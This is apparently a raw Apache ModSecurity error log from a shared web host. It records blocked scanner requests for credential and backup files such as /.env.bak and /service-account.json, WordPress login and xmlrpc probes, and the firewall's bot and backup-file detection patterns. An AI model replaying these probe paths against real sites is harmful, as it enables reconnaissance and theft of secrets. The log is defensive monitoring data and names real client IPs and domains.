[Tue May 26 13:03:34.289217 2026] [security2:error] [pid 470766:tid 470918] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "thedebateafrica.org"] [uri "/index.php"] [unique_id "ahVMzOjO_W1DqEcFHQ73JQAAABY"]
[Tue May 26 13:03:34.289814 2026] [security2:error] [pid 470766:tid 470973] [client 46.151.182.172:60928] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "thedebateafrica.org"] [uri "/"] [unique_id "ahVMzOjO_W1DqEcFHQ728AAAAE0"]
[Tue May 26 13:03:34.393560 2026] [security2:error] [pid 470766:tid 471004] [client 45.45.237.225:38498] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "athelstan.org.in"] [uri "/.env.bak"] [unique_id "ahVMzujO_W1DqEcFHQ73mQAAAGw"]
[Tue May 26 13:03:34.430543 2026] [security2:error] [pid 470766:tid 471018] [client 45.45.237.225:38494] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "athelstan.org.in"] [uri "/.env.backup"] [unique_id "ahVMzujO_W1DqEcFHQ73nAAAAHo"]
[Tue May 26 13:03:34.498773 2026] [security2:error] [pid 470766:tid 471011] [client 45.45.237.225:38532] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "athelstan.org.in"] [uri "/appsettings.json"] [unique_id "ahVMzujO_W1DqEcFHQ73qQAAAHM"]
[Tue May 26 13:03:34.498893 2026] [security2:error] [pid 470766:tid 471011] [client 45.45.237.225:38532] ModSecurity: Warning. Matched phrase "CCBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "athelstan.org.in"] [uri "/appsettings.json"] [unique_id "ahVMzujO_W1DqEcFHQ73qQAAAHM"]
[Tue May 26 13:03:34.499649 2026] [security2:error] [pid 470766:tid 470912] [client 45.45.237.225:38620] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "athelstan.org.in"] [uri "/service-account.json"] [unique_id "ahVMzujO_W1DqEcFHQ73sAAAABA"]
[Tue May 26 13:03:34.499731 2026] [security2:error] [pid 470766:tid 470912] [client 45.45.237.225:38620] ModSecurity: Warning. Matched phrase "CCBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "athelstan.org.in"] [uri "/service-account.json"] [unique_id "ahVMzujO_W1DqEcFHQ73sAAAABA"]
[Tue May 26 13:03:34.587575 2026] [security2:error] [pid 470766:tid 470940] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMzujO_W1DqEcFHQ73hQAAACw"]
[Tue May 26 13:03:34.835085 2026] [security2:error] [pid 470766:tid 470958] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "thedebateafrica.org"] [uri "/index.php"] [unique_id "ahVMzujO_W1DqEcFHQ73xAAAAD4"]
[Tue May 26 13:03:34.835673 2026] [security2:error] [pid 470766:tid 470896] [client 46.151.182.172:61405] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "thedebateafrica.org"] [uri "/"] [unique_id "ahVMzujO_W1DqEcFHQ73wAAAAAA"]
[Tue May 26 13:03:34.842320 2026] [security2:error] [pid 470766:tid 470967] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "thedebateafrica.org"] [uri "/index.php"] [unique_id "ahVMzujO_W1DqEcFHQ73wwAAAEc"]
[Tue May 26 13:03:34.842843 2026] [security2:error] [pid 470766:tid 471021] [client 46.151.182.172:61404] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "thedebateafrica.org"] [uri "/"] [unique_id "ahVMzujO_W1DqEcFHQ73vwAAAH0"]
[Tue May 26 13:03:34.859837 2026] [security2:error] [pid 470766:tid 470970] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "tedxnutm.org.ng"] [uri "/index.php"] [unique_id "ahVMzujO_W1DqEcFHQ73jQAAAEo"]
[Tue May 26 13:03:35.007119 2026] [security2:error] [pid 470766:tid 470994] [client 45.45.237.225:38706] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-grandranks.php"] [unique_id "ahVMz-jO_W1DqEcFHQ731AAAAGI"]
[Tue May 26 13:03:35.007136 2026] [security2:error] [pid 470766:tid 470975] [client 45.45.237.225:38650] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-smhonors.php"] [unique_id "ahVMz-jO_W1DqEcFHQ731gAAAE8"]
[Tue May 26 13:03:35.007184 2026] [security2:error] [pid 470766:tid 470927] [client 45.45.237.225:38630] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-grandofficers.php"] [unique_id "ahVMz-jO_W1DqEcFHQ731QAAAB8"]
[Tue May 26 13:03:35.007224 2026] [security2:error] [pid 470766:tid 471023] [client 45.45.237.225:38752] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-about-history.php"] [unique_id "ahVMz-jO_W1DqEcFHQ731wAAAH8"]
[Tue May 26 13:03:35.007285 2026] [security2:error] [pid 470766:tid 470999] [client 45.45.237.225:38580] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/index.php"] [unique_id "ahVMz-jO_W1DqEcFHQ732AAAAGc"]
[Tue May 26 13:03:35.007592 2026] [security2:error] [pid 470766:tid 471022] [client 45.45.237.225:38742] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "athelstan.org.in"] [uri "/athelstan-downloads-statutes.php"] [unique_id "ahVMz-jO_W1DqEcFHQ733AAAAH4"]
[Tue May 26 13:03:35.007669 2026] [security2:error] [pid 470766:tid 471022] [client 45.45.237.225:38742] ModSecurity: Warning. Matched phrase "CCBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "athelstan.org.in"] [uri "/athelstan-downloads-statutes.php"] [unique_id "ahVMz-jO_W1DqEcFHQ733AAAAH4"]
[Tue May 26 13:03:35.007779 2026] [security2:error] [pid 470766:tid 470994] [client 45.45.237.225:38512] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-about-overview.php"] [unique_id "ahVMz-jO_W1DqEcFHQ732wAAAGI"]
[Tue May 26 13:03:35.007879 2026] [security2:error] [pid 470766:tid 470902] [client 45.45.237.225:38582] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-provincesandcourts.php"] [unique_id "ahVMz-jO_W1DqEcFHQ732QAAAAY"]
[Tue May 26 13:03:35.007892 2026] [security2:error] [pid 470766:tid 470975] [client 45.45.237.225:38672] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-downloads-circulars-grand.php"] [unique_id "ahVMz-jO_W1DqEcFHQ733QAAAE8"]
[Tue May 26 13:03:35.008429 2026] [security2:error] [pid 470766:tid 470898] [client 45.45.237.225:38542] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-about-india.php"] [unique_id "ahVMz-jO_W1DqEcFHQ732gAAAAI"]
[Tue May 26 13:03:35.041634 2026] [security2:error] [pid 470766:tid 471014] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "friendsalongtheway.net"] [uri "/index.php"] [unique_id "ahVMzejO_W1DqEcFHQ73VwAAAHY"]
[Tue May 26 13:03:35.043461 2026] [security2:error] [pid 470766:tid 470982] [client 46.151.182.172:61028] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "friendsalongtheway.net"] [uri "/"] [unique_id "ahVMzejO_W1DqEcFHQ73VQAAAFY"]
[Tue May 26 13:03:35.082938 2026] [security2:error] [pid 470766:tid 470919] [client 45.45.237.225:38570] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-downloads-circulars-scarletmantle.php"] [unique_id "ahVMz-jO_W1DqEcFHQ734gAAABc"]
[Tue May 26 13:03:35.083258 2026] [security2:error] [pid 470766:tid 470976] [client 45.45.237.225:38666] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-contact.php"] [unique_id "ahVMz-jO_W1DqEcFHQ734wAAAFA"]
[Tue May 26 13:03:35.083287 2026] [security2:error] [pid 470766:tid 470974] [client 45.45.237.225:38494] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-website-privacy.php"] [unique_id "ahVMz-jO_W1DqEcFHQ735wAAAE4"]
[Tue May 26 13:03:35.083496 2026] [security2:error] [pid 470766:tid 470935] [client 45.45.237.225:38520] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-regalia.php"] [unique_id "ahVMz-jO_W1DqEcFHQ736AAAACc"]
[Tue May 26 13:03:35.083548 2026] [security2:error] [pid 470766:tid 470959] [client 45.45.237.225:38720] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-downloads-summons.php"] [unique_id "ahVMz-jO_W1DqEcFHQ735AAAAD8"]
[Tue May 26 13:03:35.083709 2026] [security2:error] [pid 470766:tid 470993] [client 45.45.237.225:38556] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-downloads-forms.php"] [unique_id "ahVMz-jO_W1DqEcFHQ735gAAAGE"]
[Tue May 26 13:03:35.083886 2026] [security2:error] [pid 470766:tid 470960] [client 45.45.237.225:38676] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athlestan-faq.php"] [unique_id "ahVMz-jO_W1DqEcFHQ736wAAAEA"]
[Tue May 26 13:03:35.083969 2026] [security2:error] [pid 470766:tid 470964] [client 45.45.237.225:38502] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-website-terms.php"] [unique_id "ahVMz-jO_W1DqEcFHQ736gAAAEQ"]
[Tue May 26 13:03:35.084142 2026] [security2:error] [pid 470766:tid 470938] [client 45.45.237.225:38694] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-website-disclaimer.php"] [unique_id "ahVMz-jO_W1DqEcFHQ735QAAACo"]
[Tue May 26 13:03:35.132322 2026] [security2:error] [pid 470766:tid 470953] [client 46.151.182.172:61293] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "tedxnutm.org.ng"] [uri "/"] [unique_id "ahVMzujO_W1DqEcFHQ73igAAADk"]
[Tue May 26 13:03:35.168557 2026] [autoindex:error] [pid 470766:tid 470948] [client 45.45.237.225:38498] AH01276: Cannot serve directory /home2/svijakqj/athelstan.org.in/images/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://athelstan.org.in/images
[Tue May 26 13:03:35.525464 2026] [security2:error] [pid 470766:tid 470899] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "friendsalongtheway.net"] [uri "/index.php"] [unique_id "ahVMzejO_W1DqEcFHQ73WwAAAAM"]
[Tue May 26 13:03:35.526771 2026] [security2:error] [pid 470766:tid 470998] [client 46.151.182.172:61037] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "friendsalongtheway.net"] [uri "/"] [unique_id "ahVMzejO_W1DqEcFHQ73WAAAAGY"]
[Tue May 26 13:03:36.772815 2026] [security2:error] [pid 470766:tid 470935] [client 4.201.75.230:46060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-cron.php"] [unique_id "ahVM0OjO_W1DqEcFHQ74PgAAACc"]
[Tue May 26 13:03:37.003687 2026] [security2:error] [pid 470766:tid 471018] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVM0OjO_W1DqEcFHQ74NwAAAHo"]
[Tue May 26 13:03:37.105744 2026] [security2:error] [pid 470766:tid 470908] [client 74.7.230.53:44586] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.premium.cagmedya.com"] [uri "/robots.txt"] [unique_id "ahVM0ejO_W1DqEcFHQ74UwAADCg"]
[Tue May 26 13:03:37.272832 2026] [security2:error] [pid 470766:tid 470957] [client 20.104.227.76:3039] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.drumstonemedia.com.md-74.webhostbox.net"] [uri "/wk/index.php"] [unique_id "ahVM0ejO_W1DqEcFHQ74XgAAAD0"]
[Tue May 26 13:03:38.727557 2026] [security2:error] [pid 470766:tid 470974] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVM0ujO_W1DqEcFHQ74iwAAAE4"]
[Tue May 26 13:03:38.782800 2026] [security2:error] [pid 470766:tid 470959] [client 4.201.75.230:5519] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-headre.php"] [unique_id "ahVM0ujO_W1DqEcFHQ74ogAAAD8"]
[Tue May 26 13:03:40.457077 2026] [security2:error] [pid 470766:tid 470970] [client 4.201.75.230:5545] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-links-opml.php"] [unique_id "ahVM1OjO_W1DqEcFHQ746QAAAEo"]
[Tue May 26 13:03:41.939950 2026] [security2:error] [pid 470766:tid 471013] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVM1ejO_W1DqEcFHQ75IAAAAHU"]
[Tue May 26 13:03:42.694640 2026] [security2:error] [pid 470766:tid 470973] [client 4.201.75.230:5521] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-load.php"] [unique_id "ahVM1ujO_W1DqEcFHQ75UwAAAE0"]
[Tue May 26 13:03:43.098459 2026] [security2:error] [pid 470766:tid 470873] [remote 88.198.216.95:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.216.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahVM1ujO_W1DqEcFHQ75YAAABWo"]
[Tue May 26 13:03:43.588071 2026] [security2:error] [pid 470766:tid 470975] [client 157.20.138.61:62796] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVM1-jO_W1DqEcFHQ75fQAAAE8"]
[Tue May 26 13:03:43.588260 2026] [security2:error] [pid 470766:tid 470975] [client 157.20.138.61:62796] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVM1-jO_W1DqEcFHQ75fQAAAE8"]
[Tue May 26 13:03:44.121803 2026] [security2:error] [pid 470766:tid 471006] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVM1-jO_W1DqEcFHQ75gwAAAG4"]
[Tue May 26 13:03:44.471927 2026] [ssl:error] [pid 470766:tid 470985] [client 98.84.1.175:43458] AH02032: Hostname md-74.webhostbox.net (default host as no SNI was provided) and hostname plenitudotonal.com provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 13:03:46.385964 2026] [security2:error] [pid 470766:tid 470919] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVM2ejO_W1DqEcFHQ759QAAABc"]
[Tue May 26 13:03:47.232747 2026] [security2:error] [pid 470766:tid 470982] [client 4.201.75.230:5252] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-mail.php"] [unique_id "ahVM2-jO_W1DqEcFHQ76NAAAAFY"]
[Tue May 26 13:03:48.790268 2026] [security2:error] [pid 470766:tid 470997] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVM3OjO_W1DqEcFHQ76gQAAAGU"]
[Tue May 26 13:03:49.510570 2026] [security2:error] [pid 470766:tid 470964] [client 4.201.75.230:5507] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-settings.php"] [unique_id "ahVM3ejO_W1DqEcFHQ76wQAAAEQ"]
[Tue May 26 13:03:49.768933 2026] [security2:error] [pid 470766:tid 470955] [client 104.194.132.199:57402] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.132.194.104.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVM3ejO_W1DqEcFHQ76yAAAADs"], referer: https://www.cagmedya.com/gizlilik-ve-guvenlik-politikasi/
[Tue May 26 13:03:49.769118 2026] [security2:error] [pid 470766:tid 470955] [client 104.194.132.199:57402] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVM3ejO_W1DqEcFHQ76yAAAADs"], referer: https://www.cagmedya.com/gizlilik-ve-guvenlik-politikasi/
[Tue May 26 13:03:50.508516 2026] [security2:error] [pid 470766:tid 470903] [client 104.194.132.199:57441] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVM3ujO_W1DqEcFHQ766QAAAAc"], referer: https://www.cagmedya.com/gizlilik-ve-guvenlik-politikasi/
